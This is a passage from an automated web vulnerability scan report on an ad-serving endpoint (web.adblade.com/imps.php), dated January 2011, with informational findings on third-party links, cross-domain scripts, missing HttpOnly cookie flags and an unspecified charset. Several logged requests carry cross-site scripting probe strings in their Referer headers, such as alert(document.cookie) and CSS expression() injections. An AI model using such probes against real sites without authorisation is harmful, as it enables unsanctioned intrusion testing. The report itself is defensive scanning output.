<td id="adImage" class="adImage1_124" valign="top" align="left"><a class="adTitle1_124" id="adTitle" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=3957" target="_blank"><img src="http://static.cdn.adblade.com/banners/images/100x75/4c8a36978564b.jpg" border="0" />
...[SNIP]...
<div class="adItem1_124" id="_scroll_"><a class="adDescription1_124" id="adDescription_" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=3957" target="_blank">Dallas : Discover the advantages of buying penny stocks...</a>
...[SNIP]...
</table>
<img style="display: none;" src="http://ad.doubleclick.net/ad/N553.151448.ADBLADE/B5039995.10;sz=1x1;pc=[TPAS_ID];ord=1296094946.552634117611?"/>
</td>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

3.7. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=3957&ad_width=500&ad_height=300&img_pad=2&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=124&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://markets.dispatch.com/columbusdispatch?6b6c3'-alert(document.cookie)-'83850a93671=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __tuid=3911816417521583065; __qca=P0-806598134-1296072892362; __fc=yUzvsJwZnKlW0v%2FXwZlU6EX8Z8wZ0VLU%2FBSmaePphlqOMou5wNbRICfJisFSuch6XZKzN96P0%2FA9LQma9YM5Ow%3D%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Date: Thu, 27 Jan 2011 02:52:54 GMT
Server: lighttpd/1.4.23
Content-Length: 12443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html;
...[SNIP]...
</table>
<img style="display: none;" src="http://ad.doubleclick.net/ad/N553.151448.ADBLADE/B5039995.10;sz=1x1;pc=[TPAS_ID];ord=1296096773.998133057003?"/>
</td>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

3.8. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=2610&ad_width=300&ad_height=600&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=52&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.heraldtribune.com/article/20110126/ARTICLE5867b'-alert(1)-'b08b425d4fb/101261038/2050/SPORTS
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __tuid=3911816417521583065; __qca=P0-806598134-1296072892362

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Date: Wed, 26 Jan 2011 20:18:22 GMT
Server: lighttpd/1.4.21
Content-Length: 14168

<!-- scroll appears if we set doctype -->
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" href="http://static.cdn.adblade.c
...[SNIP]...
<div style="float:left;" id="adImage" class="adImage1_70"><a class="adTitle1_70" id="adTitle" href="http://www.smarterlifestyles.com/2009/01/01/muscle-boosting-miracle-discovered-by-scientists/?fc_id=23042&fc_app_id=2610" target="_blank"><img src="http://static.cdn.adblade.com/banners/images/100x75/4d3db1afdd40b.gif" border="0" />
...[SNIP]...
<td style="vertical-align: middle;height: 75px;">
<a class="adDescription1_70" href="http://www.smarterlifestyles.com/2009/01/01/muscle-boosting-miracle-discovered-by-scientists/?fc_id=23042&fc_app_id=2610" target="_blank">New scientific discovery fuels muscle growth quickly. Stop wasting time in the gym...</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

3.9. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=429&ad_width=300&ad_height=250&img_pad=2&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=95&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.gastongazette.com/news/tie-54571-says-stone.htmlcc82f'%3balert(document.cookie)//e222a5fa214
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __tuid=3911816417521583065; __qca=P0-806598134-1296072892362; __fc=yUzvsJwZnKlW0v%2FXwZlU6EX8Z8wZ0VLU%2FBSmaePphlqOMou5wNbRICfJisFSuch6XZKzN96P0%2FA9LQma9YM5Ow%3D%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Date: Thu, 27 Jan 2011 04:26:02 GMT
Server: lighttpd/1.4.23
Content-Length: 9395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
<td id="adImage" rowspan="2" valign="top" align="center">
<a href="http://www.smarterlifestyles.com/2010/08/30/want-to-boost-your-income/?fc_id=18091&fc_app_id=429" target="_blank" class="adWarpLink1_121"">
<div class="adHiddenBlock1_121">
...[SNIP]...
<td id="adImage" rowspan="2" valign="top" align="center">
<a href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=19344&fc_app_id=429" target="_blank" class="adWarpLink1_121"">
<div class="adHiddenBlock1_121">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

3.10. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=3957&ad_width=500&ad_height=300&img_pad=2&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=124&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://markets.dispatch.com/columbusdispatch?6b6c3'-alert(1)-'83850a93671=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __tuid=3911816417521583065; __qca=P0-806598134-1296072892362; __fc=yUzvsJwZnKlW0v%2FXwZlU6EX8Z8wZ0VLU%2FBSmaePphlqOMou5wNbRICfJisFSuch6XZKzN96P0%2FA9LQma9YM5Ow%3D%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Date: Thu, 27 Jan 2011 02:22:10 GMT
Server: lighttpd/1.4.21
Content-Length: 12445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html;
...[SNIP]...
<td id="adImage" class="adImage1_124" valign="top" align="left"><a class="adTitle1_124" id="adTitle" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=3957" target="_blank"><img src="http://static.cdn.adblade.com/banners/images/100x75/4c8a36978564b.jpg" border="0" />
...[SNIP]...
<div class="adItem1_124" id="_scroll_"><a class="adDescription1_124" id="adDescription_" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=3957" target="_blank">Dallas : Discover the advantages of buying penny stocks...</a>
...[SNIP]...
</table>
<img style="display: none;" src="http://ad.doubleclick.net/ad/N553.151448.ADBLADE/B5039995.10;sz=1x1;pc=[TPAS_ID];ord=1296094930.668577288889?"/>
</td>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

4. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /imps.php?app=905&ad_width=300&ad_height=250&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=51&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/215/journalregistercompany/300x250/middletown_press_atf?t=1296072885611&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.middletownpress.com%2Farticles%2F2011%2F01%2F26%2Fentertainment%2Fdoc4d3fa2e76b25f513477040.txta5a69%2522style%253d%2522x%253aexpression(alert(1))%25225c0fc6a83d6&refer=http%3A%2F%2Fburp%2Fshow%2F23
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __tuid=3911816417521583065; expires=Mon, 25-Jan-2016 20:14:18 GMT; path=/; domain=.adblade.com
Content-type: text/html
Date: Wed, 26 Jan 2011 20:14:18 GMT
Server: lighttpd/1.4.23
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imps.php?app=905&ad_width=300&ad_height=250&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=51&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/215/journalregistercompany/300x250/middletown_press_atf?t=1296072885611&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.middletownpress.com%2Farticles%2F2011%2F01%2F26%2Fentertainment%2Fdoc4d3fa2e76b25f513477040.txta5a69%2522style%253d%2522x%253aexpression(alert(1))%25225c0fc6a83d6&refer=http%3A%2F%2Fburp%2Fshow%2F23
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __tuid=3911816417521583065; expires=Mon, 25-Jan-2016 20:14:18 GMT; path=/; domain=.adblade.com
Content-type: text/html
Date: Wed, 26 Jan 2011 20:14:18 GMT
Server: lighttpd/1.4.23
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...

5.2. http://web.adblade.com/imps.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imps.php?app=2610&ad_width=300&ad_height=600&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=52&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.heraldtribune.com/article/20110126/ARTICLE5867b'-alert(document.cookie)-'b08b425d4fb/101261038/2050/SPORTS
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __tuid=3911816417521583065; __qca=P0-806598134-1296072892362

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __fc=yUzvsJwZnKlW0v%2FXwZlU6EX8Z8wZ0VLU%2FBSmaePphlqOMou5wNbRICfJisFSuch6XZKzN96P0%2FA9LQma9YM5Ow%3D%3D; expires=Thu, 27-Jan-2011 20:18:41 GMT; path=/
Content-type: text/html
Date: Wed, 26 Jan 2011 20:18:41 GMT
Server: lighttpd/1.4.23
Content-Length: 14144

<!-- scroll appears if we set doctype -->
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" href="http://static.cdn.adblade.c
...[SNIP]...

6. HTML does not specify charset  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /favicon.ico

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /favicon.ico HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-806598134-1296072892362; __fc=yUzvsJwZnKlW0v%2FXwZlU6EX8Z8wZ0VLU%2FBSmaePphlqOMou5wNbRICfJisFSuch6XZKzN96P0%2FA9LQma9YM5Ow%3D%3D; __tuid=3911816417148998155

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Thu, 27 Jan 2011 13:00:57 GMT
Server: lighttpd/1.4.23

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Thu Jan 27 08:26:16 CST 2011.